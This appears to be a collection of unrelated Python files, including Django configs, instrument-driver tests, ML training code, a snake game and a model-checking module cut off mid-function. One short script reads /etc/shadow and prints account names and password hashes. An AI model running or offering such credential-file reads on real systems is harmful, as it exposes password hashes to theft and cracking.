13,182 | 80c5a9f11ecbe590be0cc0620c2f9f275cc6d463 | """sonar URL Configuration"""
from django.conf.urls import url, include
from .views import qa_metrics_home, qa_metrics_api
urlpatterns = [
url(r'^$', qa_metrics_home, name='qa_metrics_home'),
url(r'^(?P<project_id>[0-9]+)/(?P<start_date>[0-9 + : T -]+)/(?P<end_date>[0-9 + : T -]+)/$', qa_metrics_api, name='qa_metrics_api'),
]
|
13,183 | 918faeb71dfaec234c46316302427fd6a6dd205f | import pytest
from hypothesis import given
from hypothesis.strategies import floats, data, sampled_from
from dp800.dp800 import DP832
@pytest.fixture
def instrument():
from test.fake_visa_dp832 import FakeVisaDP832
visa_dp832 = FakeVisaDP832()
dp832 = DP832(visa_dp832)
return dp832
def test_channel_ids(instrument):
channel_ids = instrument.channel_ids
assert all(channel_ids[i+1] == channel_ids[i] + 1 for i in range(len(instrument.channel_ids) - 1))
def test_channels(instrument):
assert all(instrument.channel(id).id == id for id in instrument.channel_ids)
def test_channel_on(instrument):
for channel_id in instrument.channel_ids:
channel = instrument.channel(channel_id)
channel.on()
assert channel.is_on
def test_channel_off(instrument):
for channel_id in instrument.channel_ids:
channel = instrument.channel(channel_id)
channel.off()
assert not channel.is_on
def test_channel_is_on_on(instrument):
for channel_id in instrument.channel_ids:
channel = instrument.channel(channel_id)
channel.is_on = True
assert channel.is_on
def test_channel_is_on_off(instrument):
for channel_id in instrument.channel_ids:
channel = instrument.channel(channel_id)
channel.is_on = False
assert not channel.is_on
@given(data=data())
def test_set_voltage_setpoint_level(instrument, data):
channel_id = data.draw(sampled_from(instrument.channel_ids))
channel = instrument.channel(channel_id)
voltage = data.draw(
floats(channel.voltage.protection.min, channel.voltage.protection.max).map(
lambda v: round(v, 3)))
channel.voltage.setpoint.level = voltage
assert channel.voltage.setpoint.level == voltage
@given(data=data())
def test_set_voltage_setpoint_step_increment(instrument, data):
channel_id = data.draw(sampled_from(instrument.channel_ids))
channel = instrument.channel(channel_id)
increment = data.draw(
floats(channel.voltage.protection.min, channel.voltage.protection.max).map( # TODO: Experimentally determine maximum
lambda v: round(v, 3)))
channel.voltage.setpoint.step.increment = increment
assert channel.voltage.setpoint.step.increment == increment
@given(data=data())
def test_get_voltage_setpoint_step_default(instrument, data):
channel_id = data.draw(sampled_from(instrument.channel_ids))
channel = instrument.channel(channel_id)
assert channel.voltage.setpoint.step.default == 0.001
@given(data=data())
def test_reset_voltage_setpoint_step_default(instrument, data):
channel_id = data.draw(sampled_from(instrument.channel_ids))
channel = instrument.channel(channel_id)
increment = data.draw(
floats(channel.voltage.protection.min, channel.voltage.protection.max).map( # TODO: Experimentally determine maximum
lambda v: round(v, 3)))
default = channel.voltage.setpoint.step.default
channel.voltage.setpoint.step.increment = increment
channel.voltage.setpoint.step.reset()
assert channel.voltage.setpoint.step.increment == default
@given(data=data())
def test_set_current_setpoint_level(instrument, data):
channel_id = data.draw(sampled_from(instrument.channel_ids))
channel = instrument.channel(channel_id)
current = data.draw(floats(channel.current.protection.min, channel.current.protection.max).map(lambda v: round(v, 3)))
channel.current.setpoint.level = current
assert channel.current.setpoint.level == current
@given(data=data())
def test_set_current_setpoint_step_increment(instrument, data):
channel_id = data.draw(sampled_from(instrument.channel_ids))
channel = instrument.channel(channel_id)
increment = data.draw(
floats(channel.current.protection.min, channel.current.protection.max).map( # TODO: Experimentally determine maximum
lambda v: round(v, 3)))
channel.current.setpoint.step.increment = increment
assert channel.current.setpoint.step.increment == increment
@given(data=data())
def test_set_voltage_protection_level(instrument, data):
channel_id = data.draw(sampled_from(instrument.channel_ids))
channel = instrument.channel(channel_id)
voltage = data.draw(floats(channel.voltage.protection.min, channel.voltage.protection.max).map(lambda v: round(v, 3)))
channel.voltage.protection.level = voltage
assert channel.voltage.protection.level == voltage
@given(data=data())
def test_set_current_protection_level(instrument, data):
channel_id = data.draw(sampled_from(instrument.channel_ids))
channel = instrument.channel(channel_id)
current = data.draw(floats(channel.current.protection.min, channel.current.protection.max).map(lambda v: round(v, 3)))
channel.current.protection.level = current
assert channel.current.protection.level == current
@given(data=data())
def test_voltage_measurement(instrument, data):
channel_id = data.draw(sampled_from(instrument.channel_ids))
channel = instrument.channel(channel_id)
voltage = data.draw(floats(channel.voltage.protection.min, channel.voltage.protection.max).map(lambda v: round(v, 3)))
instrument._inst._channel_voltage_measurements[channel_id] = voltage
assert channel.voltage.measurement == voltage
@given(data=data())
def test_current_measurement(instrument, data):
channel_id = data.draw(sampled_from(instrument.channel_ids))
channel = instrument.channel(channel_id)
current = data.draw(floats(channel.current.protection.min, channel.current.protection.max).map(lambda v: round(v, 3)))
instrument._inst._channel_current_measurements[channel_id] = current
assert channel.current.measurement == current
@given(data=data())
def test_power_measurement(instrument, data):
channel_id = data.draw(sampled_from(instrument.channel_ids))
channel = instrument.channel(channel_id)
voltage = data.draw(floats(channel.voltage.protection.min, channel.voltage.protection.max).map(lambda v: round(v, 3)))
current = data.draw(floats(channel.current.protection.min, channel.current.protection.max).map(lambda v: round(v, 3)))
instrument._inst._channel_voltage_measurements[channel_id] = voltage
instrument._inst._channel_current_measurements[channel_id] = current
assert channel.power.measurement == round(voltage*current, 3)
def test_voltage_protection_enabled(instrument):
for channel_id in instrument.channel_ids:
channel = instrument.channel(channel_id)
channel.voltage.protection.enable()
assert channel.voltage.protection.is_enabled
def test_voltage_protection_disabled(instrument):
for channel_id in instrument.channel_ids:
channel = instrument.channel(channel_id)
channel.voltage.protection.disable()
assert not channel.voltage.protection.is_enabled
def test_voltage_channel_is_enabled_enabled(instrument):
for channel_id in instrument.channel_ids:
channel = instrument.channel(channel_id)
channel.voltage.protection.is_enabled = True
assert channel.voltage.protection.is_enabled
def test_voltage_channel_is_enabled_disabled(instrument):
for channel_id in instrument.channel_ids:
channel = instrument.channel(channel_id)
channel.voltage.protection.is_enabled = False
assert not channel.voltage.protection.is_enabled
def test_current_protection_enabled(instrument):
for channel_id in instrument.channel_ids:
channel = instrument.channel(channel_id)
channel.current.protection.enable()
assert channel.current.protection.is_enabled
def test_current_protection_disabled(instrument):
for channel_id in instrument.channel_ids:
channel = instrument.channel(channel_id)
channel.current.protection.disable()
assert not channel.current.protection.is_enabled
def test_current_channel_is_enabled_enabled(instrument):
for channel_id in instrument.channel_ids:
channel = instrument.channel(channel_id)
channel.current.protection.is_enabled = True
assert channel.current.protection.is_enabled
def test_current_channel_is_enabled_disabled(instrument):
for channel_id in instrument.channel_ids:
channel = instrument.channel(channel_id)
channel.current.protection.is_enabled = False
assert not channel.current.protection.is_enabled
|
13,184 | 80c88ffc5991cd732a905ccf0680c42c6f06813a | import sys
max_temp, min_temp = float('-inf'), float('inf')
# input comes from STDIN (standard input)
for line in sys.stdin:
# remove leading and trailing whitespace
line = line.strip()
# split the line into tokens
_, time, temperature = line.split(',')
try:
temperature = float(temperature.strip())
max_temp = max(max_temp, temperature)
min_temp = min(min_temp, temperature)
except:
pass
print((max_temp, min_temp))
|
13,185 | a6ace19c1bb2c3369120319299ac34e1c6165830 | # Generated by Django 3.1.2 on 2020-10-21 11:34
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('nus', '0006_establishments_patrons_queries_reservations'),
]
operations = [
migrations.AddField(
model_name='establishments',
name='email',
field=models.CharField(default='-', max_length=50),
),
migrations.AddField(
model_name='establishments',
name='location',
field=models.CharField(default='-', max_length=100),
),
migrations.AddField(
model_name='establishments',
name='type_business',
field=models.CharField(default='-', max_length=50),
),
migrations.AlterField(
model_name='establishments',
name='sublocs',
field=models.TextField(default='-', max_length=100),
),
migrations.AlterField(
model_name='establishments',
name='username',
field=models.CharField(default='-', max_length=50),
),
]
|
13,186 | e2b2217000679d4df0dcbd294f143d68947843cb | from .UpdaterTransmissionNegotiation import NegotiationResultInterface, TransmissionNegotiationInterface
from .Updater import UpdaterInterface, UpdaterAlgorithmInterface
from .UpdaterDataProcessor import UpdaterDataProcessorInterface
from .UpdaterDataAssembly import DataAssemblyInterface
|
13,187 | d50e3c6febbe5fce2d00bbcfee8d3e6999433180 | import pandas as pd
import numpy as np
try:
f=open("GSE10810_series_matrix.txt")
except IOError:
print("File myfile.fa does not exist!!")
Y = []
for line in f:
line = line.rstrip()
if line[29:55] == 'tumor (t) vs healthy (s): ':
Y = line.split("\t")
break
for i in range(0, len(Y)):
if Y[i] == '"tumor (t) vs healthy (s): S"':
Y[i] = "0"
elif Y[i] == '"tumor (t) vs healthy (s): T"':
Y[i] = "1"
else:
Y[i] = 'tumor (1) vs healty (0)'
Y_series_matrix='\t'.join(Y)
try:
D=open("series_matrix.txt",'w')
except IOError:
print("File myfile.fa does not exist!!")
Start_Reading=False
for Original_line in f:
line=Original_line.rstrip()
if line=='!series_matrix_table_begin':
Start_Reading=True
elif Start_Reading==True and line!='!series_matrix_table_end':
D.write(Original_line)
elif line=='!series_matrix_table_end':
break
D.write(Y_series_matrix)
D.close()
f.close()
|
13,188 | 482340a7dd428c5f0c682963e78630e6fdfb34dd | import os
import random
from typing import List, Tuple, Callable
import tensorflow as tf
import cpath
from cache import load_pickle_from, save_list_to_jsonl_w_fn
from data_generator.NLI.nli_info import nli_tokenized_path
from data_generator.job_runner import WorkerInterface
from dataset_specific.mnli.mnli_reader import MNLIReader
from job_manager.job_runner_with_server import JobRunnerS
from misc_lib import ceil_divide, TimeEstimator
from port_info import LOCAL_DECISION_PORT
from trainer.promise import PromiseKeeper, MyPromise
from trainer_v2.chair_logging import c_log
from trainer_v2.custom_loop.inference import InferenceHelper
from trainer_v2.custom_loop.per_task.nli_ts_util import load_local_decision_model, dataset_factory_600_3
from trainer_v2.keras_server.nlits_client import NLITSClient
from trainer_v2.per_project.cip.cip_common import get_random_split_location, split_into_two, \
SegmentationTrialInputs, SegmentationTrials
from trainer_v2.per_project.cip.nlits_direct import TS600_3_Encoder, reslice_local_global_decisions
from trainer_v2.per_project.cip.path_helper import get_nlits_segmentation_trial_save_path, \
get_nlits_segmentation_trial_subjob_save_dir
from trainer_v2.train_util.get_tpu_strategy import get_strategy2
def try_segmentations_and_save(
nltis_server_addr,
base_seq_length,
):
split = "train"
reader = MNLIReader()
query_batch_size = 64
num_step = ceil_divide(reader.get_data_size(split), query_batch_size)
ticker = TimeEstimator(num_step)
data: List[Tuple[List[int], List[int], int]] = load_pickle_from(nli_tokenized_path(split))
nlits_client: NLITSClient = NLITSClient(nltis_server_addr, LOCAL_DECISION_PORT, base_seq_length)
predict_fn = nlits_client.request_multiple_from_ids_triplets
n_try = 10
cursor = 0
all_save_entries: List[SegmentationTrials] = []
while cursor < len(data):
data_slice = data[cursor: cursor+query_batch_size]
save_entry: List[SegmentationTrials] = do_batch_request(data_slice, n_try, predict_fn)
all_save_entries.extend(save_entry)
cursor += query_batch_size
ticker.tick()
save_path = get_nlits_segmentation_trial_save_path(split)
save_list_to_jsonl_w_fn(all_save_entries, save_path, SegmentationTrials.to_json)
def do_batch_request(item_list, n_try, predict_fn: Callable[[List[Tuple[List, List, List]]], List]):
c_log.info("do_batch_request")
pk2 = PromiseKeeper(predict_fn)
si_list = []
for item in item_list:
prem, hypo, label = item
ts_input_list: List[Tuple[List, List, List]] = []
ts_input_info_list = []
for _ in range(n_try):
st, ed = get_random_split_location(hypo)
hypo1, hypo2 = split_into_two(hypo, st, ed)
ts_input = prem, hypo1, hypo2
ts_input_list.append(ts_input)
ts_input_info_list.append((st, ed))
comparison_future = SegmentationTrialInputs(
prem, hypo, label,
[MyPromise(ts_input, pk2).future() for ts_input in ts_input_list],
ts_input_info_list
)
si_list.append(comparison_future)
pk2.do_duty()
save_entry = list(map(SegmentationTrials.from_sti, si_list))
return save_entry
class SegmentationTrialWorker(WorkerInterface):
def __init__(self, n_item_per_job, output_dir):
self.output_dir = output_dir
split = "train"
self.n_item_per_job = n_item_per_job
self.data: List[Tuple[List[int], List[int], int]] = load_pickle_from(nli_tokenized_path(split))
model_path = cpath.get_canonical_model_path2("nli_ts_run87_0", "model_12500")
strategy = get_strategy2(use_tpu=False, tpu_name=None, force_use_gpu=True)
def model_factory():
model: tf.keras.models.Model = load_local_decision_model(model_path)
return model
self.inference_helper = InferenceHelper(model_factory, dataset_factory_600_3, strategy)
self.encoder_helper = TS600_3_Encoder()
def _predict(self, triplet_payload):
payload = self.encoder_helper.combine_ts_triplets(triplet_payload)
stacked_output = self.inference_helper.predict(payload)
output = reslice_local_global_decisions(stacked_output)
return output
def work(self, job_id):
random.seed(0)
st = self.n_item_per_job * job_id
ed = st + self.n_item_per_job
data_slice = self.data[st:ed]
n_try = 10
save_entry: List[SegmentationTrials] = do_batch_request(data_slice, n_try, self._predict)
save_path = os.path.join(self.output_dir, str(job_id))
save_list_to_jsonl_w_fn(save_entry, save_path, SegmentationTrials.to_json)
def main():
n_item = 400 * 1000
n_item_per_job = 5000
n_jobs = ceil_divide(n_item, n_item_per_job)
def factory(output_dir):
return SegmentationTrialWorker(n_item_per_job, output_dir)
w_path = get_nlits_segmentation_trial_subjob_save_dir()
job_runner = JobRunnerS(w_path, n_jobs, "nlits_trials", factory)
job_runner.auto_runner()
if __name__ == "__main__":
main()
|
13,189 | caa5d0eadd0f78630c929ebb0be7c7d78af30fdc | from turtle import Turtle
class Paddle(Turtle):
def __init__(self, x_position, y_position) -> None:
super().__init__()
self.penup()
self.shape("square")
self.color("white")
self.shapesize(stretch_len=1, stretch_wid=5)
self.width(20)
self.x_position = x_position
self.y_position = y_position
self.setposition(self.x_position, self.y_position)
def moveup(self):
new_y = self.ycor() + 20
self.setposition(self.xcor(), new_y)
def movedown(self):
new_y = self.ycor() - 20
self.setposition(self.xcor(), new_y) |
13,190 | 38906618e24abef24aa43c0cbbdd1313760544c1 | # coding=utf-8
import numpy as np
# from sklearn.externals import joblib
import joblib
from sklearn.metrics import confusion_matrix
# from sklearn.datasets import make_blobs
from sklearn.ensemble import RandomForestClassifier
# from sklearn.ensemble import ExtraTreesClassifier
# from sklearn.tree import DecisionTreeClassifier
# from sklearn.linear_model import SGDClassifier
# from sklearn.metrics import classification_report
# from sklearn.model_selection import train_test_split
# from sklearn.model_selection import cross_val_predict
from sklearn import metrics
from sklearn import svm
from data_common.image_common.config import *
from data_common.image_common.image_process import ImageProcess
from data_common.utils.file_util import file_util
from data_common.utils.pool_util import PoolUtility
class ModelProcess:
@staticmethod
def model_save(model, model_path):
joblib.dump(model, model_path)
return model
@staticmethod
def model_load(model_path):
return joblib.load(model_path)
@staticmethod
def model_predict(model, data):
return model.predict(data)
@staticmethod
def image_PCA_model(x_train, y_train, x_test):
pca = PCA(n_components=0.9, whiten=True)
# 理解数据
pca.fit(x_train, y_train)
# 降维处理
x_train_pca = pca.transform(y_train)
x_test_pca = pca.transform(x_test)
return x_train_pca, x_test_pca
@staticmethod
def model_train(data, labels, model_path):
"""
"""
print("trainning process >>>>>>>>>>>>>>>>>>>>>>")
# rbf = svm.SVC(kernel='rbf')
# rbf.fit(data, labels)
# linear = svm.SVC(decision_function_shape='ovo', kernel='linear')
# linear.fit(data, labels)
rf = RandomForestClassifier(n_estimators=100, max_depth=None,min_samples_split=2, random_state=0)
rf.fit(data, labels)
return ModelProcess.model_save(rf, model_path)
@staticmethod
def model_test(model, data, label):
predict_list = ModelProcess.model_predict(model, data)
print("\ntest process >>>>>>>>>>>>>>>>>>>>>>>>")
print("test precision: ", metrics.precision_score(label, predict_list, average='weighted')) # precision
print("test recall: ", metrics.recall_score(label, predict_list, average='weighted')) # recall
print("test f1 score: ", metrics.f1_score(label, predict_list, average='weighted')) # f1 score
print("confusion matrix:")
print(confusion_matrix(label, predict_list)) # 混淆矩阵
@staticmethod
def model_data_generate(train_data_path=None, captcha_path=None):
image_list = []
label_list = []
if train_data_path:
for image, label in ImageProcess.image_train_data_read(train_data_path):
image_list.append(ImageProcess.feature_transfer(image))
label_list.append(label)
if captcha_path:
for image_name, label, image in ImageProcess.image_captcha_path(captcha_path):
image_list.append(ImageProcess.feature_transfer(image))
label_list.append(label)
return np.array(image_list), np.array(label_list)
@staticmethod
def feature_transfer_iter(iter_args):
image_name, label, image = iter_args
img = ImageProcess.feature_transfer(image)
return image_name, label, img
@staticmethod
def model_data_generate_iter():
iter_results = ImageProcess.image_captcha_path(captcha_path, limit=100)
results = PoolUtility.process_pool_iter(ModelProcess.feature_transfer_iter, iter_results, 5)
for result in results:
print(result)
class AutoDefineModel(ModelProcess):
@staticmethod
def model_train(data, labels, model_path):
pass
if __name__ == '__main__':
ModelProcess.model_data_generate_iter()
# image_list, label_list = ModelProcess.model_data_generate(train_data_path=train_data_path)
# ModelProcess.model_train(image_list, label_list, model_path)
#
# model = ModelProcess.model_load(model_path)
#
# image_list_test, label_list_test = ModelProcess.model_data_generate(captcha_path=test_data_path)
# ModelProcess.model_test(model, image_list_test, label_list_test)
|
13,191 | c6a1d978c1a906722a5aaacbb8863e6904a809ab | import pygame
import time
import sys
black = pygame.Color(0, 0, 0)
white = pygame.Color(255, 255, 255)
red = pygame.Color(255, 0, 0)
green = pygame.Color(0, 255, 0)
blue = pygame.Color(0, 0, 255)
clock=pygame.time.Clock()
screen = pygame.init()
pygame.display.set_caption('snake game')
game_window = pygame.display.set_mode((700,500))
game_window.fill(red)
pygame.display.update()
snake_size=10
snake_list=[]
initial_direction=0
def snake(snake_size,snake_list):
for i in snake_list:
pygame.draw.rect(game_window,blue,[x[0],x[1],snake_size,snake_size])
def game_loop():
global initial_direction
global snake_list
x=350
y=200
y_change=0
x_change=0
while True:
for event in pygame.event.get():
if event.type == pygame.QUIT:
pygame.quit()
sys.exit()
if event.type==pygame.KEYDOWN:
if event.key==pygame.K_LEFT:
initial_direction="left"
snake_list.append(initial_direction)
elif event.key==pygame.K_RIGHT:
initial_direction="right"
snake_list.append(initial_direction)
elif event.key==pygame.K_UP:
initial_direction="up"
snake_list.append(initial_direction)
elif event.key==pygame.K_DOWN:
initial_direction="down"
snake_list.append(initial_direction)
try:
if initial_direction=="right":
if snake_list[-2]=="left":
print("sname")
else:
x_change=snake_size
y_change=0
elif initial_direction=="left":
if snake_list[-2]=="right":
pass
else:
x_change=-snake_size
y_change=0
elif initial_direction=="up":
if snake_list[-2]=="down":
pass
else:
y_change=-snake_size
x_change=0
elif initial_direction=="down":
if snake_list[-2]=="up":
pass
else:
y_change=snake_size
x_change=0
except:
if initial_direction=="right":
x_change=snake_size
y_change=0
print("initiated")
elif initial_direction=="left":
x_change=-snake_size
y_change=0
print("initiated")
elif initial_direction=="up":
y_change=-snake_size
x_change=0
print("initiated")
elif initial_direction=="down":
y_change=snake_size
x_change=0
print("initiated")
x=x+x_change
y=y+y_change
pygame.display.update()
pygame.draw.rect(game_window,blue,[x,y,snake_size,snake_size])
pygame.display.update()
clock.tick(25)
game_window.fill(black)
game_loop() |
13,192 | 567b34402d0c249f96ca9d5d9be3863d41f5f661 | #!/usr/bin/python
import sys
#Print a list of usernames
filename = "/etc/shadow"
myfile = open(filename)
lines = myfile.readlines()
myfile.close()
PASSONLY = False
if(len(sys.argv)>1 and sys.argv[1]=='-p'):
PASSONLY = True
for line in lines:
#put code here
tokens = line.split(':')
if(PASSONLY):
if(len(tokens[1])>1):
print tokens[0:2]
else:
print tokens[0]
|
13,193 | d3ed77e9897fce94816982f6cf15b88f076fbba8 | from typing import Iterator, Tuple, List, Optional, Union, Dict, FrozenSet, Set
from itertools import count, chain
from enum import IntEnum
from pysmt.fnode import FNode
import pysmt.typing as types
from pysmt.environment import Environment as PysmtEnv
from pysmt.exceptions import SolverReturnedUnknownResultError
from utils import (symb_to_next, to_next, to_curr, log, assign2fnodes, new_symb,
not_rel)
from multisolver import MultiSolver
from canonize import Canonizer
from rewritings import TimesDistributor
from expr_at_time import ExprAtTime
from generalise import Generaliser
from rankfun import RankFun
from hint import Hint, TransType
class HintMode(IntEnum):
MAY = 0
MUST = 1
ALL = 2
class BMC:
"""Iterate over abstract loops via BMC"""
_LOG_LVL = 1
_PRED_MONITOR_STR = "_bmc"
_TIMEOUT = 30
_MAX_K = -1
_HINT_MODE = HintMode.MUST
@staticmethod
def set_timeout(value: int) -> None:
assert isinstance(value, int)
BMC._TIMEOUT = value
@staticmethod
def get_timeout() -> int:
return BMC._TIMEOUT
@staticmethod
def set_max_k(val: int) -> None:
assert val is None or isinstance(val, int)
BMC._MAX_K = val
@staticmethod
def get_max_k() -> int:
return BMC._MAX_K
@staticmethod
def get_hints_mode() -> HintMode:
return BMC._HINT_MODE
@staticmethod
def set_hints_mode(val: HintMode) -> None:
assert isinstance(val, HintMode)
BMC._HINT_MODE = val
def __init__(self, env: PysmtEnv, init: FNode, trans: FNode, fair: FNode,
hints: FrozenSet[Hint], all_symbs: FrozenSet[FNode]):
assert isinstance(env, PysmtEnv)
assert isinstance(init, FNode)
assert isinstance(trans, FNode)
assert isinstance(fair, FNode)
assert isinstance(hints, frozenset)
assert all(isinstance(h, Hint) for h in hints)
assert all(h0 is h1 or h0.name != h1.name
for h0 in hints for h1 in hints)
assert isinstance(all_symbs, frozenset)
assert all(isinstance(s, FNode) for s in all_symbs)
assert all(s in env.formula_manager.get_all_symbols()
for s in all_symbs)
self.o_env = env
self.o_mgr = env.formula_manager
self.o_norm = self.o_mgr.normalize
self.i_env = PysmtEnv()
self.i_mgr = self.i_env.formula_manager
self.i_norm = self.i_mgr.normalize
i_get_free_vars = self.i_env.fvo.get_free_variables
i_get_atoms = self.i_env.ao.get_atoms
self.totime = ExprAtTime(self.i_env,
ignore_pref=BMC._PRED_MONITOR_STR)
self.td = TimesDistributor(self.i_env)
self.cn = Canonizer(env=self.i_env)
self.generaliser = Generaliser(self.i_env, self.cn, self.totime)
self.hints = sorted((h.to_env(self.i_env) for h in hints),
key=lambda h: h.name)
self.hint_active = [self._fresh_symb(f"{BMC._PRED_MONITOR_STR}_{h.name}")
for h in self.hints]
hints_ts = [h.get_trans_system(active)
for h, active in zip(self.hints, self.hint_active)]
hint_loc_active = [active for (_, _, _, active) in hints_ts]
# hint_active symbs must be frozen.
assert all(self.totime(s, 5) == s for s in self.hint_active)
self.hint_symbs = frozenset(
chain.from_iterable(symbs for (symbs, _, _, _) in hints_ts))
self.orig_symbs = frozenset(self.i_norm(s) for s in all_symbs)
self.all_symbs = frozenset.union(self.hint_symbs, self.orig_symbs,
self.hint_active)
# init of transition system.
self.init = [self.i_norm(init)]
# init of Hints encoding
self.init.extend(chain.from_iterable(
hint_init for (_, hint_init, _, _) in hints_ts))
self._orig_trans = self.i_norm(trans)
self.trans = [self._orig_trans]
self.trans.extend(chain.from_iterable(
hint_trans for (_, _, hint_trans, _) in hints_ts))
assert all(isinstance(t, FNode) for t in self.trans)
fair = self.cn(self.i_norm(fair))
assert fair in self.i_mgr.formulae.values()
assert all(s in self.i_mgr.get_all_symbols()
for s in i_get_free_vars(fair))
assert all(s in self.i_mgr.get_all_symbols()
for s in self.orig_symbs)
assert i_get_free_vars(fair) <= self.orig_symbs
assert all(i_get_free_vars(t) <= self.all_symbs |
frozenset(symb_to_next(self.i_mgr, s)
for s in self.all_symbs)
for t in self.trans)
# collect atoms for abstract loop-back detection.
lback_atms = set()
for pred in chain(i_get_atoms(fair),
(self.cn(p) for c_init in self.init
for p in i_get_atoms(c_init)
if i_get_free_vars(p) <= self.orig_symbs)):
assert i_get_free_vars(pred) <= self.orig_symbs
assert self.cn(pred) == pred
lback_atms.add(pred)
if pred.is_equals():
lt_pred = self.cn(self.i_mgr.LT(pred.arg(0), pred.arg(1)))
lback_atms.add(lt_pred)
for pred in chain.from_iterable(i_get_atoms(t) for t in self.trans):
free_v = i_get_free_vars(pred)
intsec_size = len(free_v & self.all_symbs)
# either all current or all next.
if intsec_size == len(free_v) or intsec_size == 0:
pred = to_curr(self.i_mgr, pred, self.all_symbs) \
if intsec_size == 0 else pred
pred = self.cn(pred)
lback_atms.add(pred)
if pred.is_equals():
lt_pred = self.cn(self.i_mgr.LT(pred.arg(0), pred.arg(1)))
lback_atms.add(lt_pred)
assert all(i_get_free_vars(s) <= self.all_symbs
for s in lback_atms)
assert all(self.cn(atm) == atm for atm in lback_atms)
assert all(a.is_theory_relation() or
(a.is_symbol() and a.symbol_type().is_bool_type())
for a in lback_atms)
if self.hints:
# active Hints must have disjoint symbols.
self.init.extend(Hint.disjoint_symbs(self.i_env, self.hints,
self.hint_active))
# invariant: minimise 1 ranking function at a time.
at_most_1_ranked = list(Hint.at_most_1_ranked(self.i_env, self.hints,
self.hint_active))
self.init.extend(at_most_1_ranked)
self.trans.extend(to_next(self.i_mgr, pred, self.all_symbs)
for pred in at_most_1_ranked)
# add constraint corresponding to hint encoding mode.
if BMC.get_hints_mode() is HintMode.MUST:
self.init.append(self.i_mgr.Or(self.hint_active))
elif BMC.get_hints_mode() is HintMode.ALL:
self.init.append(self.i_mgr.And(self.hint_active))
else:
assert BMC.get_hints_mode() is HintMode.MAY
self.symb2monitor = \
{s: self._fresh_symb(f"{BMC._PRED_MONITOR_STR}_{s.symbol_name()}",
m_type=s.symbol_type())
for s in chain(self.orig_symbs, self.hint_symbs)}
# self.rank_funs: List[RankFun] = []
self._new_rank_fun = False
subst = self.i_env.substituter.substitute
self._in_loop = self._fresh_symb("inloop")
self.init.append(self.i_mgr.Not(self._in_loop))
# loop begins if all(symb == monitor) & all(h_active -> h_loc_active)
start_loop = self.i_mgr.And(
chain(assign2fnodes(self.i_env, self.symb2monitor),
(self.i_mgr.Implies(h_act, h_loc_act)
for h_act, h_loc_act in zip(self.hint_active,
hint_loc_active))))
if __debug__:
self.start_loop = start_loop
self.trans.append(
self.i_mgr.Implies(symb_to_next(self.i_mgr, self._in_loop),
self.i_mgr.Or(self._in_loop, start_loop)))
# self.trans.append(
# self.i_mgr.Implies(self._in_loop,
# symb_to_next(self.i_mgr, self._in_loop)))
# monitors and symbols agree on truth assignment of all lback_atms
self.bad = [self.i_mgr.Iff(subst(atm, self.symb2monitor), atm)
for atm in lback_atms]
self.bad.append(fair)
self.bad.append(self._in_loop)
# learn ranking functions provided by the hints.
if hints is not None:
self._add_ranking_funs([loc.rf.to_env(self.i_env)
for h in hints for loc in h.locs
if loc.rf is not None])
def _fresh_symb(self, base: str, m_type=types.BOOL) -> FNode:
return new_symb(self.i_mgr, base, m_type)
def add_ranking_funs(self, ranks: List[RankFun]) -> None:
assert isinstance(ranks, list)
assert all(isinstance(rank, RankFun) for rank in ranks)
assert all(rank.env == self.o_env for rank in ranks)
self._add_ranking_funs([rank.to_env(self.i_env) for rank in ranks])
def add_ranking_fun(self, rank: RankFun) -> None:
assert isinstance(rank, RankFun)
assert rank.env == self.o_env
self._add_ranking_funs([rank.to_env(self.i_env)])
def _add_ranking_funs(self, ranks: List[RankFun]) -> None:
assert isinstance(ranks, list)
assert all(isinstance(rank, RankFun) for rank in ranks)
assert all(rank.env == self.i_env for rank in ranks)
self._new_rank_fun = True
self.bad.extend(self.cn(self.i_mgr.Not(
to_curr(self.i_mgr,
self.i_env.substituter.substitute(self.i_norm(r.progress_pred()),
self.symb2monitor),
self.all_symbs)))
for r in ranks)
def gen_loops(self) -> Iterator[
Tuple[Optional[list],
Optional[int],
Union[Optional[Tuple[List[FrozenSet[FNode]],
List[FrozenSet[FNode]]]],
bool],
Union[Optional[Tuple[List[Hint],
List[FrozenSet[FNode]],
List[FrozenSet[FNode]],
List[Tuple[RankFun, int, int]]]],
bool]]]:
assert all(pred in self.i_mgr.formulae.values() for pred in self.init)
assert all(t in self.i_mgr.formulae.values() for t in self.trans)
# assert self.fair in self.i_mgr.formulae.values()
assert all(b in self.i_mgr.formulae.values() for b in self.bad)
serialize = self.i_env.serializer.serialize
with MultiSolver(self.i_env, BMC.get_timeout(),
pref_vars=self.hint_active
if BMC.get_hints_mode() is HintMode.MAY else None,
log_lvl=BMC._LOG_LVL) as solver:
timed_symbs = [frozenset(self.totime(s, 0)
for s in chain(self.orig_symbs,
self.hint_symbs))]
for pred in self.init:
solver.add_assertion(self.totime(pred, 0))
# BMC steps.
for k in count(start=0, step=1): # BMC steps.
if BMC.get_max_k() > 0 and k > BMC.get_max_k():
return
assert len(timed_symbs) == k + 1, (len(timed_symbs), k)
timed_symbs.append(frozenset(self.totime(s, k + 1)
for s in chain(self.orig_symbs,
self.hint_symbs)))
# trans from k to k + 1
for t in self.trans:
solver.add_assertion(self.totime(t, k))
solver.push()
for pred in self.bad:
solver.add_assertion(self.totime(pred, k + 1))
self._new_rank_fun = False
ref = None
sat: Optional[bool] = True
refinements: List[FNode] = []
# enumerate loops in paths of length k + 2
while sat:
log(f"\tBMC k = {k + 2}"
f' refinement = {"; ".join(serialize(r) for r in refinements)}',
BMC._LOG_LVL)
if self._new_rank_fun:
solver.pop() # remove previous bad and refinements
solver.push()
for pred in self.bad:
solver.add_assertion(self.totime(pred, k + 1))
solver.add_assertions(refinements) # re-add refinements.
self._new_rank_fun = False
try:
sat = solver.solve()
except SolverReturnedUnknownResultError:
sat = None
log("\tBMC timeout\n", BMC._LOG_LVL)
solver.reset_assertions()
# re-add path assertions
for pred in self.init:
solver.add_assertion(self.totime(pred, 0))
for it_k in range(k + 1):
for t in self.trans:
solver.add_assertion(self.totime(t, it_k))
solver.push()
if sat is None:
# notify that we might have skipped some path.
yield None, None, None, None
elif sat is True:
model = solver.get_model()
lback_idx = self._get_lback_index(model, k + 1)
assert isinstance(lback_idx, int)
assert lback_idx >= 0
assert lback_idx < k + 1
loop_core: FrozenSet[FNode] = frozenset()
hints_region_trans: FrozenSet[FNode] = frozenset()
hints_assume: FrozenSet[FNode] = frozenset()
try:
conc_model = self._try_concretize(solver, k + 1,
lback_idx)
except SolverReturnedUnknownResultError:
conc_model = None
log("\tBMC try-concretize timeout\n", BMC._LOG_LVL)
solver.reset_assertions()
# re-add path assertions
for pred in self.init:
